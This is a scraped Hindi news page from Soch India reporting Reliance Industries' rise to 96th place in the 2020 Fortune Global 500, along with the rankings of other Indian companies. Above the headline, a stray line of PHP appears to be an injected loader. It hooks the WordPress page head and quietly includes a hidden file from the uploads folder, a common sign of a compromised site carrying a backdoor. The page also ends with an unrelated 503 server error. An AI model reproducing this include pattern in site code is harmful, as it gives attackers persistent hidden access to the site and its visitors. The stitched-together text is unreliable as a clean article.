add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); लगातार शिखर की ओर रिलायंस इंडस्ट्रीज, दुनिया की टॉप 100 कंपनियों में हुई शामिल – SOCH INDIA
Menu

देश
लगातार शिखर की ओर रिलायंस इंडस्ट्रीज, दुनिया की टॉप 100 कंपनियों में हुई शामिल

nobanner

मुकेश अंबानी के नेतृत्व वाली रिलायंस इंडस्ट्रीज ग्लोबल स्तर पर भी लगातार शिखर की ओर बढ़ रही है. रिलायंस 10 पायदान की छलांग लगाकर ‘फॉर्च्यून ग्लोबल 500’ सूची की टॉप 100 कंपनियों में शामिल हो गई है.

गौरतलब है कि मुकेश अंबानी के नेतृत्व में रिलायंस इंडस्ट्रीज लगातार तरक्की कर रही है. पिछले कुछ महीनों में रिलायंस ग्रुप की कंपनी जियो प्लेटफॉर्म्स में एक दर्जन से ज्यादा विदेशी कंपनियों ने निवेश किया है. कंपनी की बाजार पूंजी करीब 13.5 लाख करोड़ रुपये तक पहुंच चुकी है. इसकी वजह से खुद मुकेश अंबानी दुनिया के टॉप 10 बिलियनरीज में शामिल हैं और उनका नेटवर्थ करीब 80 अरब डॉलर तक हो चुका है.

फॉर्च्यून की लिस्ट में 96वां स्थान

न्यूज एजेंसी पीटीआई के अनुसार, फॉर्च्यून पत्रिका ने मंगलवार को यह सूची जारी की है. तेल, पेट्रो रसायन, खुदरा और दूरसंचार जैसे क्षेत्र में काम करने वाली रिलायंस को फॉर्च्यून की 2020 की इस वैश्विक कंपनियों की सूची में 96वां स्थान मिला है.

भारत की एकमात्र कंपनी

फॉर्च्यून की शीर्ष 100 की सूची में शामिल होने वाली रिलायंस इकलौती भारतीय कंपनी है. इससे पहले रिलायंस इस सूची में 2012 में 99वें स्थान पर रही थी, लेकिन बाद के वर्षों में फिसलते हुए 2016 में 215वें स्थान पर पहुंच गई थी. हालांकि उसके बाद से लगातार रिलायंस की रैंकिंग में सुधार हुआ है.

इंडियन ऑयल-ओएनजीसी नीचे फिसलीं

‘फॉर्च्यून ग्लोबल 500’ में 34 अंक फिसलकर सार्वजनिक क्षेत्र की इंडियन ऑयल कॉरपोरेशन 151वें स्थान पर रही. वहीं तेल एवं प्राकृतिक गैस निगम (ओएनजीसी) की रैंकिंग पिछले साल के मुकाबले 30 स्थान खिसकर 190वीं रही.

इसे भी पढ़ें: 7 रुपये का शेयर 2 साल में 800 रुपये का, क्या पेनी स्टॉक में लगाना चाहिए पैसा?

देश के सबसे बड़े बैंक, भारतीय स्टेट बैंक की रैकिंग में 15 का सुधार हुआ और यह 221वें स्थान पर रहा. इस सूची में शामिल होने वाली अन्य भारतीय कंपनियों में भारत पेट्रोलियम 309वीं, टाटा मोटर्स 337वीं और राजेश एक्पोर्ट्स 462वीं रैंक पर रहीं. ‘फॉर्च्यून ग्लोबल 500’ में कंपनियों को उनके पिछले वित्त वर्ष की कुल आय के आधार पर शामिल किया जाता है.

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.